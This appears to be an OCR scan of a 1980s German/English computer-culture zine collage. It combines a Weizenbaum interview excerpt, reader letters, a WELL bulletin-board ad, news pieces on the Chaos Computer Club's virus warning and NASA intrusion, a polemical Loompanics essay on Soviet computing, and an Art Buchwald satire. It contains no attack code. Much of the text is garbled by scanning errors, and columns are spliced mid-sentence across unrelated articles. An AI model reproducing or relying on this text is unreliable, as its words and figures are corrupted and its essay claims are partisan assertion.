wurde schheßhch herauskommen' Es ist ^ 
nichts zu fürchten. Hier ist wirklich eine 
ung notwendig. “=iret- 


Dorothea Domzalski: Mich würde nun nocR ■ 
teressieren, wieviele Menschen in den Sta 
diese Art von Technikkritik und Kritik aii 
Medien empfinden oder aussprechen wie Du 
Deine Freunde. Und darüber hinaus: Gibt^”'* 
Menschen, die etwas dagegen tun, weil sie h 
S chaden erkennen? Inwieweit können sie ^ ® 
der sein? ''Orbü- 


Joseph Weizenbaum: Das sind etwa die gleicVi 
Leute, die sich auch für den Frieden einset? *** 
Das Bewußtsein, welche Schäden die Medien 
die Gesellschaft bewirken, ist dasselbe Bcwl « 
sein, das einen über den Weltfrieden nachder^”*' 
läßt und über solche irrationalen Erscheinun 
wie den Bolschewistenhaß in den USA. 

Ich habe gerade zum erstenmal in meinen) Leb 
zwei Wochen in der Sowjetunion verbracht 
war tief beeindruckt von der FreundUchkeit'n'^ 



dem Entgegenkommen der Menschen dort. Ein 
Freund aus Ostberlin dagegen hat es einmal er¬ 
lebt, daß ihn in Washington jemand ansprach und 
ihm direkt ins Gesicht sagte: Im Vietnamkrieg 
habe ich meinen Teil an Kommunisten erschos¬ 
sen, und ich wäre bereit, jeden Tag einen Kom¬ 
munisten zu erschießen. Ich bin mir ziemlich 
sicher, daß etwas Entsprechendes in der Sovsjet- 
union unmö^ch wäre, 

Markus Schmidt: Eine letzte Frage: Sie halten 
jetzt gleich einen Vortrag im Zusammenhang der 
Anthroposophischen Gesellschaft. Hat die An¬ 
throposophie oder hat Rudolf Steiner für Sie eine 
persönliche Bedeutung oder bedeuten Ihnen die 
Ideen etwas, die von der Anthroposophie ausge¬ 
hen? 

Joseph Weizenbaum: Ich habe einmal in Tübin¬ 
gen einen Vortrag gehalten mit anschließender 
EHskussion. Da fragte dann jemand, ob ich als 
Phüosoph ausgebUdet sei. Ich verneinte das, wo¬ 
rauf mich jener Mann darauf hinwies, ich hätte 
eben etwas Ähnliches wie Kant ausgesprochen. 
Meine Antwort war: Ich nehme an, daß Kant sich 
gefreut hätte, daß ich — obwohl ich kein Philo¬ 
soph bin — auf dieselbe Sache von einer anderen 
Seite komme. Das hat mit meinem Verhältnis 
zur Anthroposophie zu tun. Ich treffe immer 
wieder Menschen, zu denen ich sofort eine Ver¬ 
bindung empfinde. Und dann — oft viel später — 
stellt sich heraus, daß Kinder dieser Menschen 
auf einer Waldorfschule sind oder sie selbst Wal¬ 
dorfschüler oder Anthroposophen sind. Diese 
Erfahrung begegnet mir immer wieder. Ich muß 
mir die Menschen gar nicht danach aussuchen, 
ob sie Anthroposophen oder Waldorfschüler sind. 
Und ich bin auch nicht sonderlich bewandert in 
der anthroposophischen Literatur. Bis vor kur¬ 
zem konnte ich das Wort “Anthroposophie” 
kaum aussprechen. 


Fishwagons 
and smart>aiecs 

Maybe you've seen it: a TV commer- 
cial for a new Computer System to 
teach young kids basic skills. The ad 
shows cute little girl listening to volce 
Synthesizer ask, "Can a fish ride in a 
Wagon?" The Computer screen she is 
watching shows a srhiling fish sitting 
in a waigon. 

Cut to girl's face. She says, “No.” 
giggles, and presses appropriate but- 
con. The right answer. 

A Wide shot shows the kids filing out 
of the classroom. with voice-over ex- 
plaining that kids in this pilot program 
scored high in Important Standard- 
ized Tests. 

Something about it bugged me. I 
broughc Up the question to my in- 
house Child Oevelopmental Curricula 
Evaluator: niece Hannah, age 8. “Can 
a fish ride in a wagon?” 

"Yes," she says. “If it had water in it. 
Or if It was a fish-selling wagon. But 
the answer would be no." 

Hannah returns to card game — co- 
incidentally, Go Fish — while uncle 
tediously embellishes child’s succinct 
wisdom. 

Hannah knew the answers (emphasis 
on che plural!)/buc more revealing 
was that she knew “the answer 


play the game get into trouble. I can’t 
vouch for the truth of this story I 
heard several years ago, but I am 
sure similar things happen in class- 
rooms daily; 

A dass had been studying how air 
pressure decreases with altitude. A 
test question asked them how a 
barometer could be used to measure 
the height of a tall building. 

All the kids dutifully scribbied out the 
single, predictable answer, except 
one. He wrote: “There are cwo 
ways. First, you could drop the 
barometer from the top of the build¬ 
ing and time how long it takes to fall. 
You can find the height with the 
equation y = lA at where y.equals 
distance dropped, a is the acceleration 
constant (gravitational acceleration is 
about 9.8 meters per second) and t 
is the time. 

“Second. you could go to the owner 
of the building and say, “Here, ril give 
you this neat barometer if you’ll teil 
me how tall your building is." 

At last report. the chlld was in trou¬ 
ble with some of his teachers. who 
labeied him a “smart alec." 

Well, nobody will mistake Hannah for 
a smart alec. When her school cuts 
teachers' salaries to buy Computers, 
and the machine asks her about fish 
locomotion,.she'll know enough to 
punch the correct, narrow, bonehead 
answer that satlsfies stupid, channeled 


Es ist schön zu erfahren, daß man sich aus ganz 
verschiedenen Richtungen auf demselben Boden 
treffen kann. 

- Markus Schmidt 


o 


would be no." At eight. she can 
play the game. 

Not surprising, really. Kids who don’t 


cireuitry. And the practice she gains 
will indeed help her do well on Impor¬ 
tant Standardiied Tests, which are as 
stupid as Computers, though cheaper. 


^ n Ihe phllosophy of Dlgitizing. Basicalty.rmaMedievdistatheart, 
harkening to a time when artists and wr'rters freel"/ exchanged 
ideas and Images. If somebody eise did a really neat Adam and Eve, why 
botherto inventanotherpose if you likedthat one? Atthattimewe hadn'tyet ^ 
gotten so spun out on ‘originality.' The point wasto get the message out, Use 
whatever material is appropriate. Artists & writers viewed themselves less as 
originators than as transmitters of material; as such were less attached to their worlo. 
(Curiousty this is almost exactly the ethic of the early hackers who started this whole 
thing: a fervent belief in the free exchange of all their discoveries.) 

Anyway, 1 think the pixelated image that Mac digitizing captures is only a shadow 
of the original—the idea of the thing, rather than the 
thing itself. Digitizing captures an idea. And when you 
finish playing around with it, what you have (if it's still 
recognizable) is an homage rather than a rip>-off. 
ln keeping with this, let me go on record as saying 
anyone who wlshes to digitize any of the Images in this 
bookisweicometodoso. May 


a hundred flowers bloom! 









What'sremarkable to me is that she 
can still come up with the right 
answers at all . . . but then, she is 
only in third grade. Thirteen years of 
computer-aided only-one-correct- 
answer testing will probably effectively 
blur the line for her between what's 
right and what's expected. 

The trend toward Computers in the 
classroom — and, for that matter, 
Computers in the real worid — is a 
wonderful thing when humans pose 
the questions and Computers find the 
answers, for the combination of human 
creativity and a computer's tireless, 
plodding research is potent. 

But do it che other way around and 
we’ll only rid the worid of smart- 
alecs. In that case, good luck to us all. 

Brad Lemley 

Washington, D.C. 

Hard disk prayers _ 

I was just reading a travel article on 
Tibet where this American business- 
man calculates that a pilgrim giving 
each of the 108 prayer wheels in 
Lhasa's Jokhang Monastery a turn as 
he or she circles around the exterior 
walls recites "Om Mani Padme Om" 

16 billion times in one Circuit as long 
as the turn possesses sufficient force 
to leave the wheel revolving ten times. 
While I don’t as yet have a TV, I am 
trying to get on this Computer band- 
wagon with you guys, like those yurts, 
funny food, clothes, books etc. when 
I was younger. So anyway, I realiaed 
that a hard or floppy disk would make 
an excellent prayerwheel, enabling a 
user to enter an untold amount of 
prayer Information and spin it very 
quickly, with ability to alter, monitor, 
and tabulate prayers as the Situation 
or times dictated. I think adding a lictle 
prayer somewhere in your roucine 
programs mighc help too, as it would 
spin around with the rest of the data 
and surely have a good effect. 

John Benecki 

Inchelium, Washington 


^»"WELL 







• A Computer conferencing System 
• A place to get Information 
• Revolutionary low price 
* An online meetingplace 


Whole Earth Lccironic Link 
27 Gaie Five Road 
Sausaliio, CA 94965 
Modem: 415/332-6106 
Voice: 415/332-4335 


It’s simple to join: 

Have your computcr/modcm dial 
415/332*6106 

When the WELL responds with its login: 
prompt, type 


and follow the tnstructlons. 


Unlnei Is 
TELENET 
New # Is: 
800/336-0437 
fiew iDgln: 
<ci> <:cr> 
Terminal • dl 
& c well 


Public Conferences and youii g« to the 

, , . ncccss tn n unitiiic cürTimunity of pcoplc 
, , , more than 80 Conferences on all nspccts of Computers 
. . , join in discussions on a widc ränge of lopics 
. , . fjet top qualiry ccchnicnl ndvice from experts 
, , , learn tiie UNIX sysrem online 
. , , tnlk wich Software devclopers 

. . , discuss politics, religion, environment, parenring, sports, music, cducarion 

Private Conferences 

Any busincss, non-prufir Organization or private gruup can have a private confcrencc; 

, . . instant communicarion 
. . . formulatc policy online for immediate action 
. . . vcrsatilc and powcrful. ready when you arc 

Electronic mail and online conversation 

. . . the end of “Telephone Tag” 

. . . f;end private messages to one person or several 
... all messages can bc stored for future refcrcnce 

Login with any computer/modem combination 

. . . transfer text fiies between incompatiblc Computers 
. . . inexpensive Inptops can have the full power of a UNIX machine 


Now the WELL 
is on UNINET 

The WELL can bc rcached from anywhere in 
the US. or around the worlJ via Uninct, 
reducing the access charges for long distance 
dramatically, espccially during off-peak hours. 
Tb rcach us via Uninct, cal! 800/821-5340 
for the numher closc.st to you. Then dinl that 
number, type IcrJ.(cT| (return/period/return) 
and when prompted for “service," type 
welllcr] 

and yovi’ll get to the WELL's login: prompt. 


Welcome! 

You are now logged in lo Ihe WELL. 

PicoSpan T2.5; designed by Marcus Watls 
Copyright 1984 NETl; all rights reserved 


OK (? orsum for help): mail 
Mailversion2.18 5/19/03. Type ?forhelp. 
7usr/spool/mail/br’: 3 messages 3 new 
>N Imme WedJulySl 13:13 13/364 ’Reteachpr- 
N 2ar1 WedJuly31 13:56 12/258 "Re-teacher- 
I N 3 gart Wed July31 16:07 13/495 "Re: dinner" 


The WELL llsts all your walting messages 
each Urne you check In. 



CO 

vy 4A 

What can The WELL 
do for you? 

• Cut mail costs 

• Save travel time and expense 

• Reduce pnperwork 

• Improve Communications with associates 

• Fester cooperative werk from different 
lücations 

• Keep records of all your transactions 

• Technical support and user groups for mos 
populär Computers 

• Put you in touch with a wide variety 
of people 

• Cut across time zones 

« Rcduce time constrainrs — people can 
respond at their convcnience 

• Help avoid “Telephone Tag” 


Who needs The WELL? 

Writers 
Hackers 
Businesses 
Movie*goers 
Salcspcople 
Professionals 
Photographers 
Non-profit organizations 










THE NEW YORK TIMES, SUNDAY, NOVEMBER 23, 1986 


Tracking a Rock Group By Computer 



„Chaos Computer Club": In Israel eingepflanzte Viren 
könnten weltweit MS-DOS-BetrIebssysteme angreifen 


Keine Geheimnisse mehr 


Zum Einbruch In den NASA*Computer 


I 


4<HUSED to use a Roladex and 
lunch hours for networking," 
said Lisa Carlson, a Com¬ 
puter Consultant at Ihe Metasys¬ 
tems Design Group, a Consulting 
firm In Arlington, Va. Now, she 
simply punches a few numbers 
onto a keyboard to reach Profes¬ 
sional colleagues. "Wlth electronic 
networking, you're not limited to 
five lunches a week," she said. 
“You can maintaln relatlon; wlth 
hundreds of people all over the 
World." 

Thb wldesp^ead use of personal 
.Computers and modems has meant 
that ß growihg number of individu- 
als iire uslng; technology kther 
than legwork to comtnunicate. 
They are Incrdaslngly siibscribing 
to electronic bulletin boards that 
enatle them td “post” Information 
and nes^ageslfor others to call up 
at will. ' 

Orte of the Ihrgest such blilletln 
boar;ds aroun(|, the Electronic In¬ 
formation Exchange System oper- 
ated out of the| Computerizeä Con- 
ferencing Center of the New Jer¬ 
sey Institute of Technology, has 
morp than 2,000 subscribers from 
private Companies such as Exxon 
and;l.B.M., Government agencles 
inclilding NASA, and various Col¬ 
leges Includin^ IHarvard. Particl- 
pants get tojltake "electronic 
coui^ses" offered by the Institute, 
as well as to shdre research infor- 
mat on wlth each other. 

"tjiltlmately, this technology will 
not Just be used as buslness tech- 


wärking Institute, a Consulting 
film in Waltham, Mass., recalls 
"< ttendlng" a computerized New 
Y :ar’s Eve party several years 
a(o[ that Involved hundreds of 
members of the electronic ex- 
cl a'nge from all over the world 
sending "Happy New Year" to 


each other via the Computer. 

In the San Francisco area, 1,700 
people pay JStjBenttFsrpd-SJ an 
hour to usewELL (the^^hole 
Earth TectiUtiJJnkJr'arsubscrlp- 
tion-based teledommunicatlons 
System started last year by Stew¬ 
art Brand, originator of the Whole 
Earth Catalogues. WELL sets up 
Separate electronic bulletin boards 
for groups of subscri^rs that 
Share specific Interests.’ 

So far, according to Cllfford Fi- 
gallo, who Is In Charge of Systems 
operatlons for WELL, bulletin 
boards on some 120 toplcs hdve 
been set up. One of the most popu¬ 
lär Involves the GratefuI Dead 
rock group. Some 250 members of 
the System communicate regu- 
larly to each other through iheir 
electronic bulletin board to share 
gosslp tidbits about the group, or 
even to offer extra tickefts. to thp 
group’9 next show. 

Other populär elect^dnlc net- 
iworks Ihave sprung upl around 
toplcs sbch as the humatfmlnd and 
true confesslons, the lattpr involv- 
Ihg members relatihg ebents that 
have shaped their llves.. 

"People think of comrnunicating 
by Computer as dull and llihuman,” 
said Mr. Flgallo. "But a| the Soft¬ 
ware and leleconferencing equip- 
ment get more sophlstli ited and 
Ihe hardware becomes pheapfer, 
Systems like these are gc hg to oe- 
come much more popule {. People 
will realize that you can Ise.cohi- 
puters to reacjh out a(jd;..louch 
someone." ' . ■ 


nology, bul will become as com¬ 
mon to the,public as the tele- 
phone," said Murray Turoff, the 
head öf the New Jersey Institute, 
’ which, Is In Newark. 

HIS| net Work already has devel- 
oped social aspects. Jessica Llp- 
naclc, a consultant wlth the Net- 


Aus Hamburg Ute Scheub 

■Was zunächst nach einem ver¬ 
späteten Aprilscherz klang, ist 
nach 'Versicherung des Hambur¬ 
ger „Chaos Computer Clubs“ 
(CCC) durchaus ernst zu neh¬ 
men. Dessen Zentralorgan ’Da- 
tcnschleudcr* zufolge wird 
heute, Freitag, den 13. Mai, ein 
aus dem Nahen Osten einge¬ 
schmuggelter Computervirus 
alle für ihn erreichbaren Daten¬ 
bestände zerstören, wenn sich 
die Betreiber nicht mit einem so¬ 
genannten „Serum“ schützen. 

Nach Berichten der Jerusale¬ 
mer Tageszeitung ’Maariv* und 
der 'New York Times' breitet 
sich das bösartige Virus in Israel 
und über die internationale Da¬ 
tenvernetzung auch in den USA 
auf Rechnern aus, die mit dem 
weitverbreiteten Betriebssy- 
stemMS-DOS gefahren werden. 

Computerviren sind soge¬ 
nannte Programmroutinen, die 
von Hackern in fremde Compu¬ 
ter eingeschleust werden, sich 
dort unkontrolliert vermehren 


und andere Daten „auffressen“. 
NVie in der Genteehr.ologie meh- 
rcnsich nach Auskunft des Chef¬ 
redakteurs der ’ Dalcnschlcuder' 
auch in der Computertechnolo¬ 
gie „Freilandversuche“: Einmal 
ins Netz ausgesetzt, kann sich 
das Virus schnell international 
verbreiten. 

Nicht nur der CCC vermutet, 
dall es sich bei der „ Virusvcrscu- 
chung“ um einen politisch moti¬ 
vierten Sabotageakt aus Anlall 
des 40. Jahrestags der Staats¬ 
gründung Israels handeln 
könnte. Dort ist inzwischen ein 
„Serum“ entwickelt worden, 
mitdem die Virusroutinc geortet 
und ausgeschaltet werden kann. 

In einem Telex an verschie¬ 
dene Bundesministcrien hat der 
CCC empfohlen, in Anlehnung 
an Israel Präventionsmaßnah¬ 
men einzuleiten. Diejenigen,de¬ 
nen das nicht mehr gelingt, soll¬ 
ten am 13. Mai den Betrieb von 
MS-DOS-Rcchnern mit mögli¬ 
cherweise lebenswichtigen Auf¬ 
gaben (z.B. in Krankenhäusern) 
vermeiden. 


D; 


I er spektakuläre Coup des „Chaos Computer Clubs“ 
^löst klammheimliche Freude aus; Wie da den Tech¬ 
nokraten, Daten-Bankiers und High-Tech-Priestem ins Allerhei¬ 
ligste gepinkelt wurde, ist ketzerisch, rotzfrech und subversiv. 
Daß die Hamburger Hacker dem Großen Bruder als nützliche 
Idioten dienen und helfen, die Schwachstellen im System zu be¬ 
seitigen — dieses Argument zieht nur auf den ersten Blick. Natür¬ 
lich wird die Computer-Firma den Zugang, den die Hacker dieses 
Mal gefunden haben, nun hochsicher versperren. Aber niemand 
glaubt, daß dann die Daten ein für allemal gesichert wären. 

J m Gegenteil; Jeder der vom heimischen Terminal und 
/ Telefon verübten Einbrüche in die Zentren der Macht 
beweist, daß es prinzipiell unmöglich ist, sie zu verhindern. 
Kommunikations-Netze funktionieren nur als offene Systeme, 
absolut gegen Mißbrauch abgescliottet ist auch eine Datenbank 
för den Gebrauch nicht besser geeignet als ein Aktenschrank 
mit Karteikarten. 

I eicht vorstellbar ist das Chaos, das der Hacker-Club 
Lm nicht umsonst im Namen führt, wenn derartige Spa¬ 
ziergänge durch den angeblich undurchsichtigen Datenwald sich 
rhizomartig als neuer Volkssport ausbreiten und für allgemeinen 
Durchblick (Glasnost!) im Daten-Dschungel des militärisch-in¬ 
dustriellen Komplexes sorgen. Die gläserne NASA beweist; Es 
gibt keine Geheimnisse mehr, Orwells Großer Bruder ist ein 
Schweizer Käse. Mathias Brö ckers 




BQUIET 

CQKlPUTEn 


TEChl^fDEOGV 


A Sumjnary 



by Michael E. Marotta 

aus: Loompanics Catalog 88 


The USSR spends billions of dollars 
importing technology from the West. 
According to the CIA they go through 
independent agents. They pay with letters 
of credit deposited with the agent s 
bank.' 

"The USSR spends bil¬ 
lions of dollars import¬ 
ing technology from the 
West" 

They want technology that can be app¬ 
lied to military efforts. They also buy 
"dual purpose" items. For instance, a 
device to lest integrated circuits is a tool 
that can be used for military projects, 
even though it is not inherently a wea- 
pons System, ln addition to equipment 
and materials, they also acquire docu- 
ments. Many have come from the Ub 
Department of Commerce which operates 
the National Technical Information 
Service.^ 

The USSR is quite possibly ahead of the 
USA in designs and theories. They lag m 
applications and engineering.^ This is 
because their society is based on stealing 
from the able to provide for the needy. 
This means that smart people go in for 
those things that cannot be expropriated. 
Chess masters keep their assets in their 
heads. 

It is easy for the USSR to keep vp with 
the West by acquiring current technology. 
The Reds cannot easily "leapfrog" the 
West. They cannot develop NEW technol- 
ogy 4 This is because they lag behind 
America in personal Computers. 

The KGB is actively recruiting Ameri- 
cans to give (or seil) them Information 
about Computer design. They supposedly 
have 300 people in Moscow who evalu- 
ate this information.= What they do with 
this information is not easy to figure out. 
Obviously, they do not produce personal 
Computers. 



Yevgeny P. Velikhov is in Charge of 
trying to make the USSR Computer liter- 
ate. He knows the score full well. He 
admits that the Soviets are "five to seven 
years behind the West."® ln fad, he owns 
an IBM-PC.'' Velikhov is a top scientist 
with direct access to the highest Soviet 
ofTicials. If he owns an IBM-PC, you can 
bet that there is no equivalent machine 
produced in the USSR. 

Some kinds of personal computing 
devices are made in the USSR. They cost 
about $500 to $750.®,« These Computers 
are about like American varieties from 
the early 1980s. They have random 
access memories (RAM) of 32 kilobytes. 
They plug into a TV set.'“ 

"Even if tbe USSR catches 
BP instantly to where we 
are right now, today, they 
will fall behind by »nnrise 
tomorrow. American* 
invont now tools cvcry 
day." 


ln all, the Soviets have produced per- 
haps more than 50,000 personal Compu¬ 
ters.“ In America, there are about 25 
million homes with cornpumrs.'® There 
are many reasons for this and chief 
among them is thal America is still prim- 
arily a trade oriented nation. Very few 
Computers are actually made in America. 
We Import Chips, disk drives, monitors, 
and so on. But the USSR jealously guards 
its hard currency. They are very cautious 
about buying 4,000 PC 
Yamaha of )apan.“ Buymg 10,000 IBM 
PCs could take forever.“ 

Even if they avoid buying from the 
West, the USSR will continue to Import 
much from its satellites. Disk drives are 
made in East Germany, Hungary and 
Bulgaria.'=The USSR has an abysmal 
record for manufacturing Computers. 
Consider the story of the Agat Computer. 


Dr. Leo Bores of Scottsdale, Arizona, is 
a surgeon who specializes in myopia. He 
uses methods developed in the USSR and 
has strong ties with colleagues there. He 
evaluated the Soviet "Agat" Computer for 
Byte magazine.’« 

The Agat was an Apple 11 clone. Instead 
of a single board, it used several chip 
modules. The Agat used CyrilUc letters. 
However, these characters were created 
with the Apple Tool Kit. When Dr. Bores 
first "boot strapped" the Agat, it ran with 
the Russian alphabet. But when he res- 
tarted the machine, it came up with a 
garbled American character set.''^ 


"The KGB is actively re- 
crniting Americans to 
give (or seil) them infor. 
mation abont Computer 
design." 


The ROM (read only memory) still had 
Steve Wozniak's name in mentory '* 
(Steve Wozniak, with Steve Jobs, founded 
the Apple Computer Corporation. Woz¬ 
niak wrote the System Software.) 

Eventually, the Computer was discon- 
tinued. One reason offered was that the 
Reds ran out of parts.'« It is also likelv 
that the $17,000 price tag helped sink 
the marketing effort.®«,®' 


This was not the first time the Reds 
have copied Western technology. The ES- 
1055, made in East Germany, is a clnnori 
IBM 370. The IBM 370 was introdured 
over 15 years ago. The ES-105 5 is the 
usual choice for Soviet factorV 
managers.«® ^ 


The Soviets have also huilt copigg j 
the Digital Equipment Corporation pnp 
11. Like the Agal/Apple, this is a do^- 
grade of the equipment we kno«, 
America. (The PDP-11 was replaegn w 
the DEC VAX line 10 years ago.) The Pnp 
11 was controlled by the LSI- n j 




grated Circuit "Computer on a Chip." 
Since the Soviets cannot produce a large 
scale integrated Chip, they implemented 
the LSI-11 as a set of Chips on a board.^^ 

"The USSR has an abys- 
mal record for manufac- 
turing Computers." 

When the USSR Chose to clone the Intel 
8080 microprocessor and its support 
Chips, they even kept the model numbers. 
The 8080 is called the K580IK80; the 
Intel 8224 clock driver is the Soviel 
K580IK24; the 8259 Interrupt Controller 
is called a K5801K59 in the USSR.2+ It is 
important to bear in mind that even in 
1984, this Chip set was not populär in 
America. Microcomputer manufacturers 
were already using the faster Intel 8088 
and 8086 Chips. 

The Intel 8080 Computers and the 
PDP-11 ran from disk drives. The Soviel 
versions used paper tape.^^ Paper tape 
went out for American Professionals in 
1974. Hobbyists stopped using it hefore 
1980. 

If technology existed in a vacuum, the 
Soviets might.actually he able to harness 
Computer power for themselves. The fact 
is that to have technology you have to 
have freedom. Take away freedom and 
technology falls. 

Some Soviel factory managers do not 
want Computers because this makes it 
hard to faisify figures.^® The error here is 
the Same as the assertion that the Nazi 
State was "elTicient." Centralized States 
have their own internal contradictions. 
You must fear those above you. You must 
deceive. Errors made at the top level 
affect the whole country. The fact is that 
the USSR cannot make effective use of 
Computers. 

"Yevgeny P. Velikhov is 
in Charge of trying to 
ntake the USSR Computer 
literate. He knows the 
score full well. He 
admits that the Soviets 
are Tive to seven years 
behind the West.'" 

The USSR fears their Underground. The 
dissidents in the USSR duplicate essays 
by hand; they type carbon copies. With 
personal Computers and dot matrix Prin¬ 
ters at their disposal, the Underground 
would really give the Soviel State some- 
thing to worry about. This has already 
happened in Poland.^r 
Yet, the USSR is caught between a rock 
and a hard place. If they deny their people 
access to Computers, they maintain con- 
trol and lose technology. If they go for 
Computer literacy, they risk a rampant 
spread of new ideas via a technology 
which invariably outstrips attempts to 
control it. The Reds may believe that they 
can.have high technology and keep their 
centralized state. This is doubtful.^B^ss^ao 
There is a long-term trend toward 
global communication. Historically, Rus- 
sia has had only brief periods of Wester- 
nization, They even maintain railroads 


1 


ART BUCHWALD 


The Gorhachev Network 



W ASHINGTON — The U.S. 

has just inslalled a new hol 
line to the Soviel Union lo prevent 
accidental war. Instead of phones, 
the System uses desk Computers. 
That’s the rub. Anyone who has 
ever watched someone using a Com¬ 
puter al an airline counter, a hotel 
rcgislralion desk or a dcpartmeni 
Store has lo be vcry ncrvous. Com¬ 
puters and the pcoplc who use 
Ihem never seem 
to be working 
togethcr al the 
same time. 

This is my 
nightmare: 

“I want to 
^eak to Mr. 

Qorbachev on 
the hot line.” 

“Just a min- 
ute, sir. I don’t _ , 

Show any Mr. Buchwald 

Gorbachev on my screen. Do you 
have a first name?” 

"Mikhail Gorbachev. Hurry up, 
the survival of ihe whole human 
race depends on your networking 
Gorbacnev in the Kremlin.” 

“Do you know his Social Securi¬ 
ty number?" 

“No, but if you don’t connect me 
in the nexl ihree minutes your body 
will tum inlo a glass of heavy wa¬ 
ter.” 

“Let me try bypassing the Com¬ 
puter by way of Armenia. Hold it, 
I’ra flashing a telephone number 
fcf Maxim Gorky. Will he do?” 

“1 want M. Gorbachev and no 
onc but M. Gorbachev.” 

“Sir, the hot-linc terminal on the 
olhcr cnd says it is sold out at the 
Bolshoi Ballet, but is willing to 
trade two house scats for a pair of 
tickcls to ‘Tlic Phunloni of ihc Op- 


MIND 

CONTROL 

l.\ 

TUt 

UNITED 

STATES 


“Teil your Computer to try Gor¬ 
bachev at his dacna.” 

“We have no access to his dacha, 
but Ijpn get you an airline seal on 
Aeroflüt to Raleigh, North Caroli¬ 
na.” 

“Your Computer was supposcd 
to be programmed to immediately 
put me in touch with tlic Icadcr cf 
the Communisi world. How do you 
explain this foul-up?” 

‘T don’t know, sir. We talked to 
someone in the Soviel Union the 
olher day.” 

□ 

“Whal did you say?” 

“We confirraed he had a double 
room al the Holiday Inn in Atlantic 
City.” 

“The clock is running. Is there no 
way of jumping the program so I 
can get ihrough directly to the Po¬ 
litbüro?" 

‘T'll tty this. ril retrieve all the 
Gorbachevs in the Moscow tele¬ 
phone book and then sorl them out 
m my memory bank.” 

“Did it Work?” 

“No, the only thing the Computer 
says is^a Mrs. Gorbachev owcs 
Bloomingdale’s $12.50.” 

□ 

“Where did you leam to run a 
Computer, young man?” 

“National Airport. The ma- 
chines there are much easier to 
work than this one, sir. 1 could get a 
Russian on my Deila Airlines res- 
ervalions screen any time 1 wanted 
10 .” 

“Hurry, man, someone has 
goofed and World War III is upon 
US.” 

"Do you want me to feed that 
into the Computer?” 

“Why not?” 

“Uh, oh — soincthing has gone 
wrong because it says we transmit- 
ted a faulty enlry on a rental car in 
Lincoln, Nebraska.” 

“Forget it, TU call Gorbachev on 
the phonc,” 

“You don’l have lo — he is on 
the phone.” 

“Why didn’l you teil me?” 

"I thoughi you wanted to speak 
to him on the Computer.” 

“Mikhail, I’m glad to talk to you. 
I don’t want you to get mad, but 
tomorrow morning you are going 
lo be receiving 100 million Read- 
er’s Digests in the mail. Just send 
them back lo us and we’ll pay the 
poslage. . . . No, Mikhail, these 
aren’t the same operators who will 
be running Star Wars. The Star 
Wars programmers are being 
trained by Easlem Airlines.” 


h. l- efV 



I 


with track gauge different frotn other 
countries to ensure their isolalion. How- 
ever, this is the age of television, not 
railroads. 

People in East Europe receive Western 
television. The USSR now produces some 
\-ideo tape cameras and players.^' When 
Computers and television merge the 
results can only be called "radical." 

Joel Schatz has a project called Ark. He 
makes it possible for people from the 
USA and the USSR to communicate via 
slow Scan television and Computer. Ele¬ 
ments in both governments fear him. 
Americans cannot be allowed to discover 
that most people in Russia like living 
there. The people in the USSR cannot be 
allowed to learn that most Americans live 
like kings.3^ 

"In all, the Soviets have 
produced perhaps more 
than 50,000 personal 

Computers." 

Schatz suffered a series of bureau- 
cratic hassles. He had to run interference 
for himself dealing with the governments 
of the USA, USSR, Britain, and Turkey. He 
triumphed. On New Year's Eve 1985/ 
1986 he finally got his linkup to work. 
This was the first effort of what Schatz 
likes to call "Two Track Diplomacy." 
Scientists from the USSR and USA dis- 
cussed peaceful uses of outer space and 
celebrated the 25th anniversary of the 
laser.’^ 

The next stage is for teens from the 
Soviel Union and America to use slow 
Scan television and Computers to discuss 
alcoholism.^* Bear in mind that olTicials 
from the US and their clones in the USSR 
put up obstacles. Schatz just works that 
much harder. 


This "two track diplomacy" also can be 
found on the PeaceNet Computer bulletin 
board You can access PeaceNet via Tel- 
enet (a long-distance packet “rrier that 
you dial locally). PeaceNet (Host 408346) 
serves dozens of leftwing and alternative 
social actiori groups. The Central Am®*'*" 
can Resource Network, the Beyond War 
Foundation, and others, give Americans 
access to people that the American 
goverhment has built a "Berlin Wall 
around. 

The USA, NATO and Japan have decided 
not to export high-tech devices like the 
IBM-PC/XT and PC/AT to the USSR. How- 
ever, it is legal to export 8-bit Computers 
like the TRS-80, VlC-20, Apple II or "plain 
vanilla" IBM PC.^= This, despite the fact 
that the Apple II can be modified to 
control missile firing.^ß Of course, this 
"modification" is easy to accomplish. 


"The Computer revolu- 
tion in America came 
from droponts, weirdos 
and nerds. Until the 
USSR can tolerate Ihese 
people, they will never 
captnre the power of the 
Computer." 

There are at least a million people in 
America who could program an Apple 11 
to run a coordinate output device. There 
are so many Systems analysts in America 
that estimates from seven sources ränge 
from 370,000 to 2.9 million. And there 
are still those 25 million home 
Computers. 

Consider that the 8-bit Computers like 
the Apple II are now obsolete in America. 
You can buy a Tl-99 or VIC-20 for bar- 
gain basement prices. Today's home 
Computers (Macintosh, Atari ST, Amiga, 


etc.) are all 16-bit machines. They are not 
available to the USSR. Yet, the H-bit 
machines will serve Soviel young people 
quite well. If the USSR wants a Computer 
literate society, they should buy all the 
outdated 8-bit machines in America. 

"Catching up to the West" is relative. It 
is quite true that the USSR as a nation 
cannot meet the Standards common in 
America as a nation. However, it is a 
grave error to assume that the USSR has 
no hackers.^'^,^®,^® First of all, the modifi- 
cations made to the Apple to produce the 
Agal were done by somebody in the USSR. 
Even if they have "very few" Computers, 
they Still have ihousands upon thousands 
of Computers. Ifyou have Computers, you 
have Computer nerds: hackers. 

Soviel hackers are called "Sinclairists” 
(alter the machines built by the British 
industrialist, Clive Sinclair). The Timex 
Sinclair was sold in America around 
1980. It ran on just four Chips and 
weighed less than half a kilogram. There 
are other Sinclair Computers, mostly sold 
in the Old World. 

'Tf technology existed in 
a vaeuum, the Soviets 
migtat actually be able to 
harness Computer power 
for themselves. The fact 
is that to have technol. 
ogy you have to have 
freedom." 

You can bet Ihat there are talented 
young Soviets who spend their time writ- 
ing their own programs. These hackers 
have üttle opporiunity for the kind ol 
"hooliganism" that plagues the USA. In 
America, you can gain unauthorized 
access to a Computer because we have 
the world's best telephone System. In the 


U.S. Computer Vandak Leam to Program Havoc 

. . . • «irtiviiv wilhin htc nertOTtal harlfs who write Troian«; are «imnlv meart. 


By Mark MeCain 

Ycrk Times Service 

NEW YORK — A new breed of vandals, working wdthin 
the vasl nelwork of U.S. compuler "bulletin boards," are 
devising sopbislicaled Software programs ihal erase and 
scramble the Computer files of unsuspecling users. 

The practice is stirring mislrusl and arger among business 
executives, academics and hobbyisls who cxchangc free 
compuler Software on the bulletin boards. 

Tbc vandals, using telephone links from their Computers, 
are transferring the destruclive programs onto the bulletin 
boards. hoping to fool Ihousands of people into duplicatmg 
the programs to use in their own Computers ai great barm. 

